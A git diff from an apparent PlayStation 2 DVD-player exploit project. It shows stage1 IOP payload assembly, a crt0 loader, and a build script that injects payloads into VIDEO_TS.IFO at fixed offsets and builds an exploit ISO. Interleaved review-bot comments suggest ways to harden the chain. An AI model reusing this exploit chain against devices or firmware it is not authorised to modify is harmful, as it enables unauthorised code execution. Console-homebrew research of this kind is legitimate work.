@@ -104,117 +109,120 @@ struct smem_buf smem_buf; typedef unsigned int SifRpcReceiveData_t; -size_t SifRpcGetOtherData(void *a, pointer x, void *dest, size_t s, int z) { - memcpy(dest, x, s); - return s; +size_t SifRpcGetOtherData(void *a, pointer x, void *dest, size_t s, int z) +{ + memcpy(dest, x, s); + return s; } -slib_exp_lib_list_t *slib_exp_lib_list(void) { - SifRpcReceiveData_t RData; - slib_exp_lib_t *core_exps; - slib_exp_lib_list_t *exp_lib_list = NULL; - u32 i, addr, core_end, NextMod, *exp_func; - void *pGetLoadcoreInternalData; - smod_mod_info_t *ModInfo; - - /* Read the start of the global module table - this is where we will search. */ - if(SifRpcGetOtherData(&RData, (void*)0x800, &smem_buf, sizeof(smod_mod_info_t), 0)>=0){ - /* The first entry points to LOADCORE's module info. We then use the - module info to determine the end of LOADCORE's .text segment (just - past the export library we're trying to find. */ - NextMod = *smem_buf.words; - if(SifRpcGetOtherData(&RData, (void*)NextMod, &smem_buf, sizeof(smod_mod_info_t), 0)>=0){ - ModInfo = &smem_buf.mod_info; - core_end = ModInfo->text_start+ModInfo->text_size; - - /* Back up so we position ourselves infront of where the export - library will be. */ - if(SifRpcGetOtherData(&RData, (void*)(core_end - 512), &smem_buf, 512, 0)>=0){ - /* Search for LOADCORE's export library. */ - for (i = 0; i < 512; i += 4) { - /* SYSMEM's export library sits at 0x830, so it should appear in - LOADCORE's prev pointer. */ - if (smem_buf.words[i / sizeof(u32)] == 0x830) { - if (!memcmp(smem_buf.bytes + i + 12, "loadcore", 8)) - //if(*(unsigned int *)(smem_buf.bytes + i + 12) == 0x64616f6c) // 6c 6f 61 64 == load - break; - } - } - if (i >= 512) - return NULL; - - /* Get to the start of the export table, and find the address of the - routine that will get us the export library list info. 
*/ - core_exps = (slib_exp_lib_t *)(smem_buf.bytes + i); - pGetLoadcoreInternalData = core_exps->exports[3]; - - if(SifRpcGetOtherData(&RData, pGetLoadcoreInternalData, &smem_buf, 8, 0)>=0){ - exp_func = smem_buf.words; - - /* Parse the two instructions that hold the address of the table. */ - if ((exp_func[0] & 0xffff0000) != 0x3c020000) /* lui v0, XXXX */ - return NULL; - if ((exp_func[1] & 0xffff0000) != 0x24420000) /* addiu v0, v0, XXXX */ - return NULL; - - addr = ((exp_func[0] & 0xffff) << 16) | (exp_func[1] & 0xffff); - - if(SifRpcGetOtherData(&RData, (void*)addr, &smem_buf, 8, 0)>=0){ - _slib_cur_exp_lib_list.tail = (slib_exp_lib_t *)(smem_buf.words[0]); - _slib_cur_exp_lib_list.head = (slib_exp_lib_t *)(smem_buf.words[1]); - exp_lib_list = &_slib_cur_exp_lib_list; - } - } - } - } - } - - return exp_lib_list; +slib_exp_lib_list_t *slib_exp_lib_list(void) +{ + SifRpcReceiveData_t RData; + slib_exp_lib_t *core_exps; + slib_exp_lib_list_t *exp_lib_list = NULL; + u32 i, addr, core_end, NextMod, *exp_func; + void *pGetLoadcoreInternalData; + smod_mod_info_t *ModInfo; + + /* Read the start of the global module table - this is where we will search. */ + if (SifRpcGetOtherData(&RData, (void *)0x800, &smem_buf, sizeof(smod_mod_info_t), 0) >= 0) { + /* The first entry points to LOADCORE's module info. We then use the + module info to determine the end of LOADCORE's .text segment (just + past the export library we're trying to find. */ + NextMod = *smem_buf.words; + if (SifRpcGetOtherData(&RData, (void *)NextMod, &smem_buf, sizeof(smod_mod_info_t), 0) >= 0) { + ModInfo = &smem_buf.mod_info; + core_end = ModInfo->text_start + ModInfo->text_size; + + /* Back up so we position ourselves infront of where the export + library will be. */ + if (SifRpcGetOtherData(&RData, (void *)(core_end - 512), &smem_buf, 512, 0) >= 0) { + /* Search for LOADCORE's export library. 
*/ + for (i = 0; i < 512; i += 4) { + /* SYSMEM's export library sits at 0x830, so it should appear in + LOADCORE's prev pointer. */ + if (smem_buf.words[i / sizeof(u32)] == 0x830) { + if (!memcmp(smem_buf.bytes + i + 12, "loadcore", 8)) + // if (*(unsigned int *)(smem_buf.bytes + i + 12) == 0x64616f6c) // 6c 6f 61 64 == load + break; + } + } + if (i >= 512) + return NULL; + + /* Get to the start of the export table, and find the address of the + routine that will get us the export library list info. */ + core_exps = (slib_exp_lib_t *)(smem_buf.bytes + i); + pGetLoadcoreInternalData = core_exps->exports[3]; + + if (SifRpcGetOtherData(&RData, pGetLoadcoreInternalData, &smem_buf, 8, 0) >= 0) { + exp_func = smem_buf.words; + + /* Parse the two instructions that hold the address of the table. */ + if ((exp_func[0] & 0xffff0000) != 0x3c020000) /* lui v0, XXXX */ + return NULL; + if ((exp_func[1] & 0xffff0000) != 0x24420000) /* addiu v0, v0, XXXX */ + return NULL; + + addr = ((exp_func[0] & 0xffff) << 16) | (exp_func[1] & 0xffff); + + if (SifRpcGetOtherData(&RData, (void *)addr, &smem_buf, 8, 0) >= 0) { + _slib_cur_exp_lib_list.tail = (slib_exp_lib_t *)(smem_buf.words[0]); + _slib_cur_exp_lib_list.head = (slib_exp_lib_t *)(smem_buf.words[1]); + exp_lib_list = &_slib_cur_exp_lib_list; + } + } + } + } + } + + return exp_lib_list; } -#define EXP_LIB_MAX SMEM_BUF_SIZE /* We can even handle CDVDMAN's bloat! */ +#define EXP_LIB_MAX SMEM_BUF_SIZE /* We can even handle CDVDMAN's bloat! 
*/ int slib_get_exp_lib(const char *name, slib_exp_lib_t *library) { - SifRpcReceiveData_t RData; - slib_exp_lib_list_t *exp_lib_list = &_slib_cur_exp_lib_list; - slib_exp_lib_t *exp_lib = &smem_buf.exp_lib; - void *cur_lib; - int len = strlen(name), count = 0; + SifRpcReceiveData_t RData; + slib_exp_lib_list_t *exp_lib_list = &_slib_cur_exp_lib_list; + slib_exp_lib_t *exp_lib = &smem_buf.exp_lib; + void *cur_lib; + int len = strlen(name), count = 0; - if (!exp_lib_list->head && !(exp_lib_list = slib_exp_lib_list())) - return 0; + if (!exp_lib_list->head && !(exp_lib_list = slib_exp_lib_list())) + return 0; - /* Read the tail export library to initiate the search. */ - cur_lib = exp_lib_list->tail; + /* Read the tail export library to initiate the search. */ + cur_lib = exp_lib_list->tail; - while (cur_lib) { - if(SifRpcGetOtherData(&RData, cur_lib, exp_lib, EXP_LIB_MAX, 0)>=0){ - if (!memcmp(exp_lib->name, name, len)) { - while (exp_lib->exports[count] != 0) - count++; + while (cur_lib) { + if (SifRpcGetOtherData(&RData, cur_lib, exp_lib, EXP_LIB_MAX, 0) >= 0) { + if (!memcmp(exp_lib->name, name, len)) { + while (exp_lib->exports[count] != 0) + count++; - if (library) - memcpy(library, exp_lib, sizeof(slib_exp_lib_t) + count * 4); + if (library) + memcpy(library, exp_lib, sizeof(slib_exp_lib_t) + count * 4); - return count; - } + return count; + } - cur_lib = exp_lib->prev; - } - } + cur_lib = exp_lib->prev; + } + } - return 0; + return 0; } -void *resolve(char *name, int export) { - slib_exp_lib_t *modload_lib = (void *)0x100; +void *resolve(char *name, int export) +{ + slib_exp_lib_t *modload_lib = (void *)0x100; - memset(&_slib_cur_exp_lib_list, 0, sizeof(slib_exp_lib_list_t)); + memset(&_slib_cur_exp_lib_list, 0, sizeof(slib_exp_lib_list_t)); - if (!slib_get_exp_lib(name, modload_lib)) { - return NULL; - } + if (!slib_get_exp_lib(name, modload_lib)) { + return NULL; + } - return modload_lib->exports[export]; + return modload_lib->exports[export]; } 
diff --git a/PAYLOADS/1.00-2.13/stage1_210_212.iop.S b/PAYLOADS/1.00-2.13/stage1_210_212.iop.S
index f1c51a1..a4da1a9 100644
--- a/PAYLOADS/1.00-2.13/stage1_210_212.iop.S
+++ b/PAYLOADS/1.00-2.13/stage1_210_212.iop.S
@@ -3,7 +3,7 @@
 flushIcache = 0x00002f40
 flushDcache = 0x0003044
-#flushDcacheWrapper = 0x0057f1c
+# flushDcacheWrapper = 0x0057f1c
 iop_payload_address = 0xa00fd000
@@ -11,54 +11,59 @@ iop_payload_address = 0xa00fd000
 .global _start
 _start:
- move $fp, $sp # We need to reset $fp as it gets trashed by memcpy
+ move $fp, $sp # We need to reset $fp as it gets trashed by memcpy
- la $v1, 0x27bdffc8 # addiu $sp, $sp, -0x38
+ la $v1, 0x27bdffc8 # addiu $sp, $sp, -0x38
 check_110:
- #la $v0, READ_SECTORS_110
- #lw $t0, 0($v0)
- #beq $t0, $v1, read_iop_payload
+ #la $v0, READ_SECTORS_110
+ #lw $t0, 0($v0)
+ #beq $t0, $v1, read_iop_payload
 check_210:
- la $v0, READ_SECTORS_210
- lw $t0, 0($v0)
- beq $t0, $v1, read_iop_payload
+ la $v0, READ_SECTORS_210
+ lw $t0, 0($v0)
+ beq $t0, $v1, read_iop_payload
 check_212:
- la $v0, READ_SECTORS_212
+ la $v0, READ_SECTORS_212
 read_iop_payload:
- la $a0, (IOP_PAYLOAD_SIZE / 0x800) + 1 # count
- la $a1, 0x700000 / 0x800 # sector
- la $a2, iop_payload_address # destination
- jal $v0
-
- #jal flushIcache
- #jal flushDcache
-
- #jal ENTRY
- la $v0, ENTRY
- jalr $v0
-
- la $v1, 0x27bdffc8 # addiu $sp, $sp, -0x38
+ la $a0, (IOP_PAYLOAD_SIZE / 0x800) + 1 # count
+ la $a1, 0x700000 / 0x800 # sector
+ la $a2, iop_payload_address # destination
+ jal $v0
-check_110_again:
+ # jal flushIcache
+ # jal flushDcache
+
+ # jal ENTRY
+ la $v0, ENTRY
+ jalr $v0
+ la $v1, 0x27bdffc8 # addiu $sp, $sp, -0x38
+
+check_110_again:
+ # AKuHAK:
+ # la $v0, READ_SECTORS_110
+ # lw $v0, 0($v0)
+ # la $a0, RETURN_ADDRESS_LOCATION_110
+ # la $ra, ORIGINAL_RETURN_ADDRESS_110
+ # beq $v0, $v1, return
 check_210_again:
- la $v0, READ_SECTORS_210
- lw $v0, 0($v0)
- la $a0, RETURN_ADDRESS_LOCATION_210
- la $ra, ORIGINAL_RETURN_ADDRESS_210
- beq $v0, $v1, return
+ la $v0, READ_SECTORS_210
+ lw $v0, 0($v0)
+ la $a0, RETURN_ADDRESS_LOCATION_210
+ la $ra, ORIGINAL_RETURN_ADDRESS_210
+ beq $v0, $v1, return
 check_212_again:
- la $a0, RETURN_ADDRESS_LOCATION_212
- la $ra, ORIGINAL_RETURN_ADDRESS_212
+ la $a0, RETURN_ADDRESS_LOCATION_212
+ la $ra, ORIGINAL_RETURN_ADDRESS_212
 return:
- # Return gracefully back to original return address
- sw $ra, 0($a0)
- la $v0, 0
- jr $ra
+ # Return gracefully back to original return address
+ sw $ra, 0($a0)
+ la $v0, 0
+ jr $ra
diff --git a/PAYLOADS/1.00-2.13/stage1_213.iop.S b/PAYLOADS/1.00-2.13/stage1_213.iop.S
index 5619259..81f82e5 100644
--- a/PAYLOADS/1.00-2.13/stage1_213.iop.S
+++ b/PAYLOADS/1.00-2.13/stage1_213.iop.S
@@ -3,7 +3,7 @@
 flushIcache = 0x00002f40
 flushDcache = 0x0003044
-#flushDcacheWrapper = 0x0057f1c
+# flushDcacheWrapper = 0x0057f1c
 iop_payload_address = 0xa00fd000
@@ -11,28 +11,28 @@ iop_payload_address = 0xa00fd000
 .global _start
 _start:
- move $fp, $sp # We need to reset $fp as it gets trashed by memcpy
+ move $fp, $sp # We need to reset $fp as it gets trashed by memcpy
- la $v0, READ_SECTORS_213
+ la $v0, READ_SECTORS_213
 read_iop_payload:
- la $a0, (IOP_PAYLOAD_SIZE / 0x800) + 1 # count
- la $a1, 0x700000 / 0x800 # sector
- la $a2, iop_payload_address # destination
- jal $v0
-
- #jal flushIcache
- #jal flushDcache
-
- #jal ENTRY
- la $v0, ENTRY
- jalr $v0
-
- la $a0, RETURN_ADDRESS_LOCATION_213
- la $ra, ORIGINAL_RETURN_ADDRESS_213
+ la $a0, (IOP_PAYLOAD_SIZE / 0x800) + 1 # count
+ la $a1, 0x700000 / 0x800 # sector
+ la $a2, iop_payload_address # destination
+ jal $v0
+
+ # jal flushIcache
+ # jal flushDcache
+
+ # jal ENTRY
+ la $v0, ENTRY
+ jalr $v0
+
+ la $a0, RETURN_ADDRESS_LOCATION_213
+ la $ra, ORIGINAL_RETURN_ADDRESS_213
 return:
- # Return gracefully back to original return address
- sw $ra, 0($a0)
- la $v0, 0
- jr $ra
+ # Return gracefully back to original return address
+ sw $ra, 0($a0)
+ la $v0, 0
+ jr $ra
diff --git a/PAYLOADS/1.00-2.13/syscalls.ee.S b/PAYLOADS/1.00-2.13/syscalls.ee.S
index 6dedaec..1ec1bff 100644
--- a/PAYLOADS/1.00-2.13/syscalls.ee.S
+++ b/PAYLOADS/1.00-2.13/syscalls.ee.S
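Review bot: `check_212` never verifies its signature before `read_iop_payload` does `jal $v0`: when the `check_210` compare fails, the code loads `READ_SECTORS_212` and calls it unconditionally, so on a firmware that is neither 2.10 nor 2.12 (the `check_110` path is commented out in both places) stage1 calls an arbitrary address and, if that happens to return, jumps to `ENTRY` in a buffer that was never filled. Mirroring the `check_210` pattern with a `lw`/`bne` and parking on a self-loop keeps an unrecognised firmware from executing unverified code, which is also what the commented `check_110_again` block would need once it is revived. The return value of the `jal $v0` read is likewise discarded before `ENTRY` is called; if the read routine reports failure in `$v0` (I can't tell from here), the same spin would be the safer reaction. If the file is assembled under `.set noreorder` (the top of the file is outside the hunk) the instruction after each branch executes in the delay slot, so a `nop` would be needed after the new `bne`.
```asm
check_212:
    la $v0, READ_SECTORS_212
    lw $t0, 0($v0)
    bne $t0, $v1, unknown_firmware   # neither 2.10 nor 2.12 signature matched
    # … unchanged: read_iop_payload … return: …
unknown_firmware:
    b unknown_firmware               # spin rather than jal into unverified code
```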
@@ -4,6 +4,7 @@
 # as GCC adds move $v1, $v0 directly after jr $ra, effectively trashing $v0.
 # I don't know why this happens, but I do know enough about GCC that this
 # approach will most probably be easier. But feel free to try fixing it.
+# TODO: fill an issue to the ps2dev team
 .global GetThreadId
 GetThreadId:
@@ -43,14 +44,14 @@ SifSetReg:
 .global SifGetReg
 SifGetReg:
- la $v1, 0x7a
- syscall 0x7a
- jr $ra
+ la $v1, 0x7a
+ syscall 0x7a
+ jr $ra
 .global ExecPS2
 ExecPS2:
- la $v1, 0x07
- syscall 0x07 # BTW why do we put the number here also?
+ la $v1, 0x07
+ syscall 0x07 # BTW why do we put the number here also?
 # Not a syscall, but it might as well be.
diff --git a/Filesystems/2.10-2.13/BOOT.ELF b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/BOOT.ELF
similarity index 100%
rename from Filesystems/2.10-2.13/BOOT.ELF
rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/BOOT.ELF
diff --git a/Filesystems/2.10-2.13/VIDEO_TS/VIDEO_TS.IFO b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VIDEO_TS.BUP
similarity index 100%
rename from Filesystems/2.10-2.13/VIDEO_TS/VIDEO_TS.IFO
rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/VIDEO_TS.BUP
diff --git a/PAYLOADS/3.03-3.11/crt0_3.10.elf b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VIDEO_TS.IFO
similarity index 62%
rename from PAYLOADS/3.03-3.11/crt0_3.10.elf
rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/VIDEO_TS.IFO
index 526b7b3..3722fa8 100644
Binary files a/PAYLOADS/3.03-3.11/crt0_3.10.elf and b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VIDEO_TS.IFO differ
diff --git a/Filesystems/2.10-2.13/VIDEO_TS/VTS_01_0.IFO b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_0.BUP
similarity index 100%
rename from Filesystems/2.10-2.13/VIDEO_TS/VTS_01_0.IFO
rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_0.BUP
diff --git a/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_01_0.IFO b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_0.IFO
similarity index 83%
rename from Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_01_0.IFO
rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_0.IFO
index 0b6bed8..8d78ffe 100644
Binary files a/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_01_0.IFO and b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_0.IFO differ
diff --git a/PREBUILT ISOs/Some 2.10 models and all 2.12.iso b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_1.VOB
similarity index 72%
rename from PREBUILT ISOs/Some 2.10 models and all 2.12.iso
rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_1.VOB
index a3e0371..5bb4f1b 100644
Binary files a/PREBUILT ISOs/Some 2.10 models and all 2.12.iso and b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_1.VOB differ
diff --git a/PAYLOADS/3.03-3.11/build.sh b/PAYLOADS/3.03-3.11/build.sh
old mode 100644
new mode 100755
index d6afdad..6828fcd
--- a/PAYLOADS/3.03-3.11/build.sh
+++ b/PAYLOADS/3.03-3.11/build.sh
@@ -1,50 +1,72 @@ -echo "Building payload" +#!/bin/sh +# TODO: replace ee-gcc with EE_CC ?= ee-gcc +# TODO: move flags into oneline: EE_CFLAGS = -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 +echo "Building payload" ee-gcc -Ttext=0x01FFF800 payload.c -o payload.elf -nostartfiles -nostdlib -ffreestanding -Os -Wl,-z,max-page-size=0x1 # 2048 ee-objcopy -O binary payload.elf payload.bin -Wl,-z,max-page-size=0x1 +PAYLOAD_SIZE=$(stat -c '%s' payload.bin) +dd if=payload.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x3000)) count=$PAYLOAD_SIZE conv=notrunc -ENTRY=`ee-objdump -t payload.elf | grep " _start"` -echo $ENTRY - -# Doesn't seem to work on MinGW toolchain, so set manually if you're using that: -#ENTRY=0x`grep -o "^\S*" <<< $ENTRY` -ENTRY=0x01fff99c +ENTRY=$(ee-objdump -t payload.elf | grep " _start") +echo "$ENTRY" +ENTRY=$(echo 0x"$ENTRY" | awk '{print $1}') echo $ENTRY +# ENTRY=0x'grep -o "^\S*" <<< $ENTRY' +# Doesn't seem to work on MinGW toolchain, so set manually if you're using that: +# ENTRY=0x01fff99c +# echo $ENTRY echo "Building crt0 (3.03)" ee-gcc -Ttext=0x015FFF34 -DENTRY=$ENTRY -DGETBUFFERINTERNAL=0x262360 crt0.S -o crt0_3.03.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 ee-objcopy -O binary crt0_3.03.elf crt0_3.03.bin -Wl,-z,max-page-size=0x1 +CRT0_303_SIZE=$(stat -c '%s' crt0_3.03.bin) +dd if=crt0_3.03.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x0e8c)) count=$CRT0_303_SIZE conv=notrunc echo "Building crt0 (3.04M)" ee-gcc -Ttext=0x01800180 -DENTRY=$ENTRY -DGETBUFFERINTERNAL=0x261548 crt0.S -o crt0_3.04M.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 ee-objcopy -O binary crt0_3.04M.elf crt0_3.04M.bin -Wl,-z,max-page-size=0x1 +CRT0_304M_SIZE=$(stat -c '%s' crt0_3.04M.bin) +dd if=crt0_3.04M.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x2d00)) count=$CRT0_304M_SIZE conv=notrunc echo "Building jump for 3.04J" -ee-gcc -Ttext=0x012811E4 -DJUMP=0x01281340 jump.S -o jump.elf -nostartfiles 
-nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 -ee-objcopy -O binary jump.elf jump.bin -Wl,-z,max-page-size=0x1 +ee-gcc -Ttext=0x012811E4 -DJUMP=0x01281340 jump.S -o jump_3.04J.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 +ee-objcopy -O binary jump_3.04J.elf jump_3.04J.bin -Wl,-z,max-page-size=0x1 +JUMP_304J_SIZE=$(stat -c '%s' jump_3.04J.bin) +dd if=jump_3.04J.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x2724)) count=$JUMP_304J_SIZE conv=notrunc echo "Building crt0 (3.04J)" ee-gcc -Ttext=0x01281340 -DENTRY=$ENTRY -DGETBUFFERINTERNAL=0x261560 crt0.S -o crt0_3.04J.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 ee-objcopy -O binary crt0_3.04J.elf crt0_3.04J.bin -Wl,-z,max-page-size=0x1 +CRT0_304J_SIZE=$(stat -c '%s' crt0_3.04J.bin) +dd if=crt0_3.04J.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x2880)) count=$CRT0_304J_SIZE conv=notrunc echo "Building crt0 (3.10)" ee-gcc -Ttext=0x01500014 -DENTRY=$ENTRY -DGETBUFFERINTERNAL=0x2986a0 crt0.S -o crt0_3.10.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 ee-objcopy -O binary crt0_3.10.elf crt0_3.10.bin -Wl,-z,max-page-size=0x1 +CRT0_310_SIZE=$(stat -c '%s' crt0_3.10.bin) +dd if=crt0_3.10.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x2bb4)) count=$CRT0_310_SIZE conv=notrunc echo "Building crt0 (3.11)" ee-gcc -Ttext=0x01500014 -DENTRY=$ENTRY -DGETBUFFERINTERNAL=0x2952f0 crt0.S -o crt0_3.11.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 ee-objcopy -O binary crt0_3.11.elf crt0_3.11.bin -Wl,-z,max-page-size=0x1 +CRT0_311_SIZE=$(stat -c '%s' crt0_3.11.bin) +dd if=crt0_3.11.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x2954)) count=$CRT0_311_SIZE conv=notrunc + +echo "CREATE UDF ISO" +genisoimage -udf -o exploit.iso udf/ echo "Done." 
-echo "For the All Slims image:" -echo "Insert crt0_3.03.bin into VIDEO_TS.IFO at offset 0x0e8c" -echo "Insert jump.bin into VIDEO_TS.IFO at offset 0x2724" +echo "For the Dragon image:" +echo "Insert crt0_3.03.bin into VIDEO_TS.IFO at offset 0x0e8c" +echo "Insert jump_3.04J.bin into VIDEO_TS.IFO at offset 0x2724" echo "Insert crt0_3.04J.bin into VIDEO_TS.IFO at offset 0x2880" -echo "Insert crt0_3.10.bin into VIDEO_TS.IFO at offset 0x2bb4" -echo "Insert crt0_3.11.bin into VIDEO_TS.IFO at offset 0x2954" -echo "Insert payload.bin into VIDEO_TS.IFO at offset 0x3000" - -echo "For 3.04M only image:" -echo "Insert fullpayload.bin at 0x2d00, and payload.bin at 0x3000" +echo "Insert crt0_3.11.bin into VIDEO_TS.IFO at offset 0x2954" +echo "Insert crt0_3.10.bin into VIDEO_TS.IFO at offset 0x2bb4" +echo "Insert crt0_3.04M.bin into VIDEO_TS.IFO at offset 0x2d00" +echo "Insert payload.bin into VIDEO_TS.IFO at offset 0x3000" +# generate 1 image for all 3.03+, 3.04M is the same in that terms +# echo "For 3.04M only image:" +# echo "Insert crt0_3.04M.bin at 0x2d00, and payload.bin at 0x3000" diff --git a/PAYLOADS/3.03-3.11/crt0.S b/PAYLOADS/3.03-3.11/crt0.S index 437e6cf..bd9e5f8 100644 --- a/PAYLOADS/3.03-3.11/crt0.S +++ b/PAYLOADS/3.03-3.11/crt0.S 
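Review bot: The new `dd ... conv=notrunc` stages write each blob into `udf/VIDEO_TS/VIDEO_TS.IFO` at a fixed offset with `count=$SIZE` but never check that the blob fits its slot, so an oversized `payload.bin` or crt0 stub silently overwrites the bytes of the next stage, and a failing `ee-gcc` step leaves `$PAYLOAD_SIZE` empty while `genisoimage` still emits an `exploit.iso`. Since crt0.S in this same commit fetches the payload with a single-sector read (`la $a2, 0x3000 / 0x800`, count `0x800 / 0x800`), `payload.bin` in particular must stay within 0x800 bytes. Add `set -eu` after the shebang so any failing toolchain step aborts the build, and guard the payload copy with `[ "$PAYLOAD_SIZE" -le 2048 ] || { echo "payload.bin ($PAYLOAD_SIZE bytes) exceeds the 0x800-byte sector crt0 loads" >&2; exit 1; }`; the same check against each slot's distance to the next patched offset (presumably the usable room, e.g. 0x2954-0x2880 = 212 bytes for crt0_3.04J) would catch an oversized crt0 stub. Note also that `stat -c '%s'` is GNU coreutils syntax and fails on BSD/macOS `stat`, which deserves a comment next to the existing MinGW remark.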
@@ -7,35 +7,35 @@ .global _start _start: - la $a0, load - la $a1, 0 - la $a2, 0 - la $a3, 0 + la $a0, load + la $a1, 0 + la $a2, 0 + la $a3, 0 .global ExecPS2 ExecPS2: - la $v1, 7 - syscall 7 # ExecPS2 + la $v1, 7 + syscall 7 # ExecPS2 load: - la $a0, 0 - la $a1, 0 # 0 = VIDEO_TS.IFO, 1 = VTS_01_0.IFO - la $a2, 0x3000 / 0x800 # lba offset in file - la $a3, payload # Destination - la $t0, 0x800 / 0x800 # Count - la $v0, getBufferInternal - jalr $v0 - la $t1, 0 + la $a0, 0 + la $a1, 0 # 0 = VIDEO_TS.IFO, 1 = VTS_01_0.IFO + la $a2, 0x3000 / 0x800 # lba offset in file + la $a3, payload # Destination + la $t0, 0x800 / 0x800 # Count + la $v0, getBufferInternal + jalr $v0 + la $t1, 0 boot: - la $v1, 0x64; la $a0, 0; syscall 0x64 # FlushCache data writeback - la $v1, 0x64; la $a0, 2; syscall 0x64 # FlushCache instruction invalidate + la $v1, 0x64; la $a0, 0; syscall 0x64 # FlushCache data writeback + la $v1, 0x64; la $a0, 2; syscall 0x64 # FlushCache instruction invalidate - # Point stack to end of scratchpad RAM - #la $sp, 0x70004000 - lui $sp, 0x7000 + # Point stack to end of scratchpad RAM + # la $sp, 0x70004000 + lui $sp, 0x7000 - # Execute from relocated place - la $v0, ENTRY - j $v0 - ori $sp, 0x4000 + # Execute from relocated place + la $v0, ENTRY + j $v0 + ori $sp, 0x4000 diff --git a/PAYLOADS/3.03-3.11/crt0_3.03.bin b/PAYLOADS/3.03-3.11/crt0_3.03.bin deleted file mode 100644 index b597d33..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.03.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.03.elf b/PAYLOADS/3.03-3.11/crt0_3.03.elf deleted file mode 100644 index 6747ad1..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.03.elf and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.04J.bin b/PAYLOADS/3.03-3.11/crt0_3.04J.bin deleted file mode 100644 index 56c2d04..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.04J.bin and /dev/null differ 
diff --git a/PAYLOADS/3.03-3.11/crt0_3.04J.elf b/PAYLOADS/3.03-3.11/crt0_3.04J.elf deleted file mode 100644 index 0f58533..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.04J.elf and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.04M.bin b/PAYLOADS/3.03-3.11/crt0_3.04M.bin deleted file mode 100644 index 5475657..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.04M.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.04M.elf b/PAYLOADS/3.03-3.11/crt0_3.04M.elf deleted file mode 100644 index 0ae906f..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.04M.elf and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.10.bin b/PAYLOADS/3.03-3.11/crt0_3.10.bin deleted file mode 100644 index 070b4a0..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.10.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.11.bin b/PAYLOADS/3.03-3.11/crt0_3.11.bin deleted file mode 100644 index 9d0f5a2..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.11.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.11.elf b/PAYLOADS/3.03-3.11/crt0_3.11.elf deleted file mode 100644 index 4c0ddec..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.11.elf and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/jump.S b/PAYLOADS/3.03-3.11/jump.S index ee22303..6474c49 100644 --- a/PAYLOADS/3.03-3.11/jump.S +++ b/PAYLOADS/3.03-3.11/jump.S @@ -4,5 +4,5 @@ .global _start _start: - j JUMP - nop + j JUMP + nop diff --git a/PAYLOADS/3.03-3.11/jump.bin b/PAYLOADS/3.03-3.11/jump.bin deleted file mode 100644 index e6861a6..0000000 Binary files a/PAYLOADS/3.03-3.11/jump.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/jump.elf b/PAYLOADS/3.03-3.11/jump.elf deleted file mode 100644 index ccdf4b4..0000000 Binary files a/PAYLOADS/3.03-3.11/jump.elf and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/payload.bin b/PAYLOADS/3.03-3.11/payload.bin deleted file mode 100644 index 484402c..0000000 Binary files a/PAYLOADS/3.03-3.11/payload.bin and /dev/null differ 
